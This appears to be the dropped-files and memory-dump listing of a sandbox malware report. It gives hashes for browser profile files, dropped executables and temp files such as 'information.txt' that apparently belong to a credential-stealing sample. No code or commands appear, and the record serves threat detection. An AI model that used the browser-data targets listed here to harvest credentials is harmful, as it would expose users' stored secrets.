MD5 5a2191276c78a8737e7103d140db84b4
SHA1 1221d1bbae39f49114974ec6fe8557c9368cc5d1
SHA256 f58c56010cf7b8f6973fb0565b20eb6e590c2fddb4d1d4dfe8651cc653c65c4e
SHA512 5146bc50bc21bb85b76ae5921a437320d6240e683723c2b50f9488c820f8abc3d2bef9ea515c5e8ee9f0bd9c026270bb91d1ce3e1a0e292085197a3f11b7f339

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 725f3e0783d766a16b2f478388f756e6
SHA1 1d0f88aa5e62693408d1c716813a563e6f0fc88f
SHA256 b0aa9bdb87855649d4bc971e06f12e38a372718512715f0db168264375d7c3cf
SHA512 4febe0fdf4ccf04ed77c9f3f64640a231afbc74572a99c77af2e09211bc02cca381deda8cee9fdf760ad4ad9259c856d10f53ceeb4055b93f0aac1febd1ebb0c

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e7f310d69e34111a1f3ce5eacc856a84
SHA1 c88296dc29fc11dcde9b403bbe6e1760d2c674f0
SHA256 89705ba1bfafebf68b0c7e73eacbe252ed9e6017d7b40a3e1721dc1452764c0f
SHA512 9651e734f5bb5bcd89c239fec60088b162366b86c138d58d58a8e6602ef10ffeeecb89c872427d2b8fa21fd0c147a5eb567fba67df8c7b5e0602627fa0074a78

C:\Windows\Temp\7b11c220-d6b9-4585-99a6-1648b521b24c.tmp

MD5 37a47b6f0520efe1a88add2d0afc0294
SHA1 5fe0685e87a2dac274174601d5e5c9a445a400a0
SHA256 8b29e905b7e15e85d80b8fa9507b9b73111196e5538202edb24d2bccb7ec5112
SHA512 3564959298a732620b355f37be3d77eea56340987703e3f78a5860d4e98811e19964dfdc6ec889ea61611ffe6a0910eb20b9f724c4d5f0c7c4f6dccccbb40cf3

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0b8d9fc0258ad61c92a2a27e3259c71c
SHA1 d828d0814a93c80778e3f7933ee5fb025f73e388
SHA256 c7e8e1531374d01fb5168ab7975c06fd191231fedd29ed620e500426dbeda8f6
SHA512 2ae9f6cc2bccafecbf279347642bb75e203e25abc40fa76bd02851dba923c746b7256bb9c8e91ea775f265be3085f383e4a39762db1114bac2dd9b45fb8d5ed7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7df768c6572bccf792f65987607685f8
SHA1 1804dcf1bc9b3f5cc2f98e067311011505d6e4e2
SHA256 ac6b0676abc359db9e4dd7abab710a435f58dff42eb03d00517c3a0d9812be69
SHA512 1c963a5a6605ae2792e9d0591815a45aeea7130d6570c0643dc6019a269f2f5bf1248852922e6e670fd0228e7c4e4ccaafe0a75baea26eb17394a8a319cf4a99

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\activity-stream.discovery_stream.json.tmp

MD5 650061210664f51cbe031553ed1e68e4
SHA1 393962fcaf20b7690a3a8aadf18bbb0a061b0c77
SHA256 db1dc6c71181d702f9a683044283f93eb243146a44d0bb4858da266a7f1b3b79
SHA512 2107fff47e2d9af4879fc74289c30f0a94b9e63a49958a26373bec40f9cf6b910864db0166dfd238de6a13256ac8b62c2c4ad904e89bc86819982f67d478803b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs.js

MD5 112a8d0a9dbb58193415a5ae0c9fc0e3
SHA1 f86b67091a7da61d447d4c7700e2a115527d80a0
SHA256 f60449013adde7c036654c4e46bebae37a6440cad3e94e1d50ab74b3e5f8e790
SHA512 b5a66162da0ce9646a13d2ee812c5221b471bbf5c65331424e90596e6467afb1f104f9d8fb20d8802c95170f11e4faf54135d90fd7d7f2b0fd613188227e1b4d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs-1.js

MD5 e8a984ddd2c0199d10018f5d2729fc24
SHA1 a1337d52252f72f234ab2eef2f2beec6112184ed
SHA256 c226b9d251b379b9a14d3d9452fc3e2195a4f74f25b300d1af83becb1542de0a
SHA512 a0db85d69841fb9142340fba7d01e73cdb7ee54c92eda2728ef57de53cc3adc5d9dc6cc58046fda3508b5a1fdb94d3a7c89a00e4ee63baf51bd769410dabe34a

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 740c2efd6bb9dd4f58d946899df24485
SHA1 229b3a5d508a260cc4edfd5ddd42194362fb1e5e
SHA256 0799fe959df88f6dfe56f1402652cc8a265e722077549c93dc0ae7da644136ff
SHA512 8ccbbb49e64fe6f5a8b231f10b43631587e61cc8d97a078a4fb9258891692bc1611dec4ac27bc2273cc49ff5799b050d4a82e466cfb14bcaf28a66d827ffadcb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\sessionstore-backups\recovery.jsonlz4

MD5 4c7ea7a44d834b23cfadec258901b220
SHA1 4d70421e56369af4425ffb0d3792cc418eb64cf1
SHA256 18c0219a4180e636e43624bf779afa30cc674ad18e3b754a2abf9747a508d699
SHA512 90c16dec890a34e83d188e1cd16042e2c3d14a9bbba0920f4278765d794df9d74fc0e4e16ba48e70592c484ecbafbe7e6ff2f8385ba621e48d2530d8af0e62c4

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b400809a880823bfce821ebf74ede358
SHA1 b96c030887d8245d69c42e78493d219a65c3dcdb
SHA256 411bb22995b9b3cdf4bef3d2af30a7bc97dfcd6090b5a3c64600359f60e30889
SHA512 68872ccafe9672c5b395c28b2eb6fa862a70e848eb6345082ea35ce19c3e3c99a812d82f3df943f6db5f305b3567e76dbb6cbcef3084f21b11634b85a21ebe15

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\sessionstore-backups\recovery.jsonlz4

MD5 5617231d0083f06da9ca54aee73d3866
SHA1 0cfc69484aacdbf440f20273be42cc5934479b64
SHA256 5fa4625d524fe0a43727ac076ea41f43ef4d2c0e59dda6c372a37fba6d85b622
SHA512 2d44df4d0e96da86d428ca02e42fc3935c1f223023b56df0981007cc5725571d5b622f5f68ac305389a40924fa0f8b6baf0dd0343ac6b54da31dcc4cb0824211

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs-1.js

MD5 118c3715554c7aa256d9b38fd849d869
SHA1 0ccb8cc8a40c55add6af081844ea0a821c5a7634
SHA256 70008dd40e598f008c9aed96e4dc63e0c8ab9433549d1e4b01456d7dedf0d528
SHA512 92c55abcd2e40d7ba8da9bf074630ef581ff3a609627be8e1cdd25f9468897aad4f2d1bdabe4e2bab319f2fac39a332dab72798ab3c54cdafdb725e2cdb171c7

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\cache2\entries\577A586685F8D27BD5B926CE96132B84424D8EA4

MD5 83f5746b1c7f585057ad879d365248fe
SHA1 f332e6ca015ba22757198d2a4b8a90bb345f026b
SHA256 09a8aec5d64109dfff6f4f1290fdaf78ee70ae2b2fe2eb8f0e44802ef73f09b4
SHA512 05e0651260f3eba4bdf99948a106bde98088d6e48b655ef81423d2f6ddeab78d17b7b340248698187106c06ee4dcfd9dbbfafdcd4713cae295233a680e314381

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs-1.js

MD5 d66ad1d2f8e758a02e789790d893223d
SHA1 37cd089cfee232b38ef5084e331deba54375531f
SHA256 0d708a0b5ce9b7a7dbf3f69dbc702880966d4dc9f64c26db74761739de7d2d71
SHA512 89d99e3c713c4032229d74bf206242554a692c82f6e9f32f3a5dc3d667435b11e77b412752b0789bd0114ef2846eb12bd6698fa0c1d74009ec5f7fa889e75332

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 11a936b1f1e1ca6418fe788912618507
SHA1 ae260ceab0b4f2100483535d5e25f3ea5cb2c0e4
SHA256 4bb0967161027d62d670350c60c1b5ff069e5eafe172cf63638ff0c3ff756f75
SHA512 dad40be54fac7a9606683f03038302c60add2ef5dfdb3322e460bf56cdce8373dee5c3880246e515fb937731519daf94a362591d8a3ecd7fa3dededed5481443

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\sessionstore-backups\recovery.jsonlz4

MD5 29fe6a0e25a4b69074fa51626a40680a
SHA1 d31ea62bda3345f600292a477ec7b35c457fbae0
SHA256 25d27f382daaa20664f20d95ad947b171b5ba6d7681761d431a0d23a395b291e
SHA512 336038d294edeb773479cb4e74fdeaf2663da5bb68fd41e9dcc1df1818ed1672544ff61f4b4e4eb7430b6258340ddedc56cac932cdfc4f390a5b6c9d575d07e2

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 9ea7ee09a4ca5088310d578f8506d73a
SHA1 c17153d23d8fabd242bb25e1dffb688b3a2c6fbe
SHA256 94097669318cec76a77c669d4fce0e88e3aee2fdc7a3a541f84aadb0d177b327
SHA512 277c197a15c7b402b6e6ad30de141073d0c4471bc6b6b2c8f574a3ebf8c2a25dd33cd56cde4bd265e129d3d2385bd3d99ae161991e33455d7b97613be663b948

memory/6104-8140-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8143-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8156-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8157-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8158-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8159-0x0000000000400000-0x0000000001204000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tempAVSDTnlunsidO_T\2jQJv37iJ0lzHistory

MD5 650006254bbb65543d701f6d1fcd2c9f
SHA1 83768e418b037c844b80a229d7d3f40aba9f2ff6
SHA256 19de64ebf1886109fc0b73f430e6f9d69ed10987aaa6a8c7953f8d37a1f4a121
SHA512 bfe1f7602e888f1d87526e329d1f7dddbafe046bb4ad7a215dd8aee374a7b23bc60e659d59c416c9f7d4da5d8858f87ba1cb5355902234b663093ce46fc8f0eb

C:\Users\Admin\AppData\Local\Temp\tempCMSDTnlunsidO_T\information.txt

MD5 f752ea12f034ff22dee8fae16df7314b
SHA1 90bfb1dcd2a8304be26744cb5a597516ddf88169
SHA256 8c6b19cf779c1460b25508a7dbc8682c248f6e027d8ec382c5a9d8093a1bdb86
SHA512 59b0087029e96cde44bbbed604f957bc770a1560e21c0f7665207aafaa52c006bdc23e9b3814180ed4af508f4757389c7adf28c4ef6cf910a1c51b2c650725d1

C:\Users\Admin\AppData\Local\Temp\OperaConnect2\OperaConnect2.exe

MD5 fbfbadacf7a4c8bc252021dcf719e9b9
SHA1 af855ddd1a0157b9edf432bc81fbfbc44edd97a8
SHA256 e9f765ba3c25951e6d6ad8d13133c569862ae77ccaf65de7683c3d40c903cf90
SHA512 267654f51561cbfe40efba8f370d3b93a337218982ae526611fdef324e7e49f037f76991d8751dad160a88381617a9661245ca2e9ee794fe6dfec6de082f2551

memory/6236-8251-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6104-8261-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6236-8266-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6236-8267-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6236-8268-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6236-8269-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6236-8271-0x0000000001360000-0x0000000001361000-memory.dmp

memory/6236-8272-0x0000000003550000-0x00000000035C2000-memory.dmp

memory/6104-8273-0x0000000000400000-0x0000000001204000-memory.dmp

memory/6236-8310-0x0000000003550000-0x00000000035C2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\cert9.db

MD5 9ce60f46d534174e0857791d6a1b34de
SHA1 3fc6de9f373cd8b32f89200115b9bfb2e77550c4
SHA256 2b4f28b0ad1bf141375043554b9db03a5e36b49b735351033a55a035fa7dfe35
SHA512 233400eb7d1b5b034ecafdbede448d99f0406347f3639e131fd05e7fb50aa61070ac4ec38db8d433410a7946860b5e68af0f2a0a32c8ba48a2dabc0ee314a582

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\cache2\doomed\31215

MD5 c4053ce644a5f83699470178f39b95da
SHA1 057572302a2823d80d363fc7cfb2fc9cce4433a9
SHA256 787a94456f5d3164fed752bc99f072ee81b7249f2253a49b23802f97b3995e94
SHA512 1d63a8f62d9385f7ace5f738c2da033bdb2554ee6e9849fd786d37da44460d0c72112051c73a3cdfc885b7ecfb91f3b28a976e54bdeff6ee365ccee1f9aa862f

memory/6236-8337-0x0000000000400000-0x0000000001204000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs.js

MD5 c4a6271b5bdbd7a622bdcf7c527fe399
SHA1 3476f0bcb939e0a3e908df274b4415bc44a7b868
SHA256 a22130ee77fc05c86925bf8cc4a284565ece9cfa49667091f32a678c908e2a98
SHA512 2f23ea832f27c1fde24490514beeae9d7c17fa115a91f0db0b91ff58c2b9442ced3e2b51fce3779c9dddd08fccd6df0eea99d8e62761bddc0795b3f1e73ab86b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\datareporting\glean\db\data.safe.bin

MD5 1c3c58f7838dde7f753614d170f110fc
SHA1 c17e5a486cecaddd6ced7217d298306850a87f48
SHA256 81c14432135b2a50dc505904e87781864ca561efef9e94baeca3704d04e6db3d
SHA512 9f6e9bcb0bba9e2ce3d7dabe03b061e3fda3f6d7b0249ecf4dbc145dc78844386d047ee2ac95656a025ef808cd0fc451204dc98a1981cf2729091761661a3b49

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 adb587797161786ef1cbb5a70cefcaa8
SHA1 1ab9a45eb8e55451c5616c0c26fb02d5fcf2c3e3
SHA256 4bf0582ddace2d9b62692551d50b354c7d206b76fadb92220664469240e3053c
SHA512 7dcbc16b68669d230bba5971a96cea35906d1a90e75c9ce5b3a63744cdf821ddc5c4229f9c5a7f263c35633e1c25b7493b337231baf3797af5063a40a7d14d97

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs-1.js

MD5 915f5d4959ac5a2538fbd0bca2b74f9b
SHA1 a34f48eebc694fab8f70cee7bf188cab12dcc39e
SHA256 39c8c4d93f7d2b2828f8db682f14773e58db6548d7d844cd20d39bafe646d180
SHA512 9fe1c0f54cf6ba50b6518a2235151fea437e72c42f05b55ce9e79cc548030495c5b654b673f3524ec06ada6964df9335f44d9a9f33913930ac3a53502542229e

memory/6104-8391-0x0000000000400000-0x0000000001204000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\datareporting\glean\db\data.safe.bin

MD5 b1c8aa9861b461806c9e738511edd6ae
SHA1 fe13c1bbc7e323845cbe6a1bb89259cbd05595f8
SHA256 7cea48e7add3340b36f47ba4ea2ded8d6cb0423ffc2a64b44d7e86e0507d6b70
SHA512 841a0f8c98dd04dc9a4be2f05c34ecd511388c76d08ca0f415bfb6056166d9a521b8bc2c46b74697f3ecdac5141d1fe6af76dd0689350caca14e9f849ee75a8b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 e6ae37bbbcdfd71205f4e0fcfeec9e84
SHA1 44fb88b13dfdf6482009524caa36beb9d5803c83
SHA256 8f564a5af20ee5a7c792bc9df315e08adbf76f0134fd994b1d78d158c348abe4
SHA512 c842222e7943f059032858e903e28e2fdb3d105a0de8a57dc64873681a57b0bc4a8d83aa66503e7eec711bd459c8773e380a6f073de1b2fac9b3c2badd2aefbc

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 d05ffef9148fc6c30e3f9787a14b1a54
SHA1 bc1832befb8ada21db693d3c5bbd753342f45e41
SHA256 2bf2196e8296777567e1be190b173708d3a523e7559a2fa6777de3e41ed3e98d
SHA512 be793746f01713bcc16e1439e16cda9ffd21272fa60d5ba449e045d4230d79b8688048bae8ac5a0d85ed7cb6c35d8d9bca877ee335a8bd4a8d94af333eaa3f87

C:\Users\Admin\Downloads\2023-11-23-04.y526WVIU.zip.part

MD5 cf31d50ce4cd8ac9c7987796a2e0c8d7
SHA1 0ede2a2473bb617e0b15c43b8e4839780cf95875
SHA256 7807b448d21f3e6b57e4e0970668b9883d9b14a65268c12d12b2b2b47523c71d
SHA512 0e210a13cfe5bc152ae5491f14e4c029708b097a702fc6cdaf9a6360bec2e745243b269d5beb98d3bf396accc3e838863b420433b49d3eadc85c55f42c5110bd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\sessionstore-backups\recovery.jsonlz4

MD5 349a672128810ff81591d060342a2ed6
SHA1 87d8cd39ee32c1eb75cfbd86805dd17c4124fc85
SHA256 8549d6a6ebfe01aba7ea52db36f78191ae5d705ff206cfdfc5cdce5887f1a695
SHA512 52447bb3a0dcc5d723e43b46a09e8a73af1d5155e38a439b6ae798dbb6273741c3255f84b96a69b5c1d7bc41fcb28c8f22aea437b12565c42e7df7fc57313da1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\datareporting\glean\db\data.safe.bin

MD5 c58234a092f9d899f0a623e28a4ab9db
SHA1 7398261b70453661c8b84df12e2bde7cbc07474b
SHA256 eaec709a98b57cd9c054a205f9bfa76c7424db2845c077822804f31e16ac134c
SHA512 ae2724fc45a8d9d26e43d86bcc7e20f398d8ab4e251e89550087ace1311c4d2571392f2f0bed78da211fcb28766779c1853b80742faa69f722b2c44c283569fd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\datareporting\glean\db\data.safe.bin

MD5 7fba44cb533472c1e260d1f28892d86b
SHA1 727dce051fc511e000053952d568f77b538107bb
SHA256 14fb5cda1708000576f35c39c15f80a0c653afaf42ed137a3d31678f94b6e8bf
SHA512 1330b0f39614a3af2a6f5e1ea558b3f5451a7af20b6f7a704784b139a0ec17a20c8d7b903424cb8020a003319a3d75794e9fe8bc0aeb39e81721b9b2fdb9e031

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\cache2\doomed\21575

MD5 50af70fbbdb8f4eb1f5aa66625c7083c
SHA1 240298f56ba5e100aab611ae3dc25f5eaa640fd6
SHA256 81ceaab2a9c5d9221aea0d911f8fd5edff2e10a8631b953e6bae11a2b5d0bf4d
SHA512 e20942b2f794cc4996817518daea9020d695c3616d8496bcfdbbed00eb513c0f9bfbbc35999d98761aeabff3ed126a03e477a1674ecc6df6aafb0b59ca242c81

C:\Users\Admin\AppData\Roaming\RrzzrIaRwnI.exe

MD5 170c497de89a698235d5c203f65da668
SHA1 8221743aa2125e139c97b2e6e326180b382b8c94
SHA256 7d7b62e77cbef24e0b75ea88d79b68a84e2fccdd74dac22de7c18476ce8313ce
SHA512 0240dc7766bb286a58b698c4bb499e9f908ad5ff92010a7f3b8ff27e5f5338fee433fb78a3e8f9624999f9e179e471165e41692852994cb1fffc8826882fd685

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 918b6c44eda994b61024d058c3c255f0
SHA1 3939db47fd10cd9c20c5a651a177af56e4b85534
SHA256 60779b187c762acb068585f288228423d28750f51faff4028d838838a75ba2e1
SHA512 d76390f637f3de518283ab208ff53c3bbee57011a8e213c1406845b18e7a7130cb7ec9a8ebfb9fb70135eef3a4289869168c7ea23eda64071dc912fc67b374a4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\prefs-1.js

MD5 52e0d7afc75a5e0732c13483e13abbae
SHA1 68a378da61763d044cef98a282c776ca6a7830f0
SHA256 ccfb92d74e5aaf091e8b643882e23b77ea2c53278e700300068471c39dbe6b59
SHA512 ad8f7b7c64911a7fa151f425f995e8257c146aab809572a1410d341b3f2c72e3a95c76a37b85a3945da9554db44dff5b854c9286a610d6d1a3900002c3bbc968

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\broadcast-listeners.json

MD5 c4727006039f6e59406bd2d497404a6c
SHA1 e74f0ff5c511cb200821ed5019762d3950d25958
SHA256 e4ac904153000079f154368a0eff7d9bd9860253bc8bf7ef1176395c79770767
SHA512 09bfbfcf1dd8afd636d98a6d8edea4161d3e296443b3a324b5236772f4e9e7c60f31a91c4fd566aef3504c83f5656cdfd1167954c37bfd30d2d9232e40816056

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\extensions.json

MD5 99819008094de7dedbf6a987b21907b6
SHA1 fb8c96be9425ebfe899485e97ca269c8de56be90
SHA256 96b11309c3db59092969e70abaef7511fbf6c45b6f87b0f978b2391bdc9164e8
SHA512 1de6bf8f9696f0504d15bb087782f54d9131ad85dce5dd0df9d30caacad8656bef95bb7df4c5138626a2468695d1671b204e0dddc773fa35f6ee14164c4c701e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\xulstore.json

MD5 1995825c748914809df775643764920f
SHA1 55c55d77bb712d2d831996344f0a1b3e0b7ff98a
SHA256 87835b1bd7d0934f997ef51c977349809551d47e32c3c9224899359ae0fce776
SHA512 c311970610d836550a07feb47bd0774fd728130d0660cbada2d2d68f2fcfbe84e85404d7f5b8ab0f71a6c947561dcffa95df2782a712f4dcb7230ea8ba01c34c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\targeting.snapshot.json

MD5 85dfd3d87d90f9ce0975f34c67c5c7b7
SHA1 5e679c3708f518abc5f940be3511c353d4338979
SHA256 60b4bb4cc85bfe4c05d6e99b37f825277fb40ab2dbe6fc5822cd028a25d2762f
SHA512 1c5a940538527f13d1c20d7086d7a62c42db1bf78be47ed48fd1a14dbcef73ae451e78890c6b7ac8b792986e8f96a123084d906b98a4932662e4c8104473d5cf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\sessionCheckpoints.json

MD5 c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA1 5942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA256 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA512 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\recipe_attachment.json

MD5 be3d0f91b7957bbbf8a20859fd32d417
SHA1 fbc0380fe1928d6d0c8ab8b0a793a2bba0722d10
SHA256 fc07d42847eeaf69dcbf1b9a16eb48b141c11feb67aa40724be2aee83cb621b7
SHA512 8da24afcf587fbd4f945201702168e7cfc12434440200d00f09ddcd1d1d358a5e01065ac2a411fdf96a530e94db3697e3530578b392873cf874476b5e65d774a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_home_and_garden.json

MD5 250acc54f92176775d6bdd8412432d9f
SHA1 a6ad9ad7519e5c299d4b4ba458742b1b4d64cb65
SHA256 19edd15ebce419b83469d2ab783c0c1377d72a186d1ff08857a82bca842eea54
SHA512 a52c81062f02c15701f13595f4476f0a07735034fcf177b1a65b001394a816020ee791fed5afae81d51de27630b34a85efa717fe80da733556fdda8739030f49

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_autos_and_vehicles.json

MD5 39b73a66581c5a481a64f4dedf5b4f5c
SHA1 90e4a0883bb3f050dba2fee218450390d46f35e2
SHA256 022f9495f8867fea275ece900cfa7664c68c25073db4748343452dbc0b9eda17
SHA512 cfb697958e020282455ab7fabc6c325447db84ead0100d28b417b6a0e2455c9793fa624c23cb9b92dfea25124f59dcd1d5c1f43bf1703a0ad469106b755a7cdd

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_sports.json

MD5 ce4e75385300f9c03fdd52420e0f822f
SHA1 85c34648c253e4c88161d09dd1e25439b763628c
SHA256 44da98b03350e91e852fe59f0fc05d752fc867a5049ab0363da8bb7b7078ad14
SHA512 d119dc4706bbf3b6369fe72553cfacf1c9b2688e0188a7524b56d3e2ac85582a18bbee66d5594e0fb40767432646c23bf3e282090bd9b4c29f989a374aeae61f

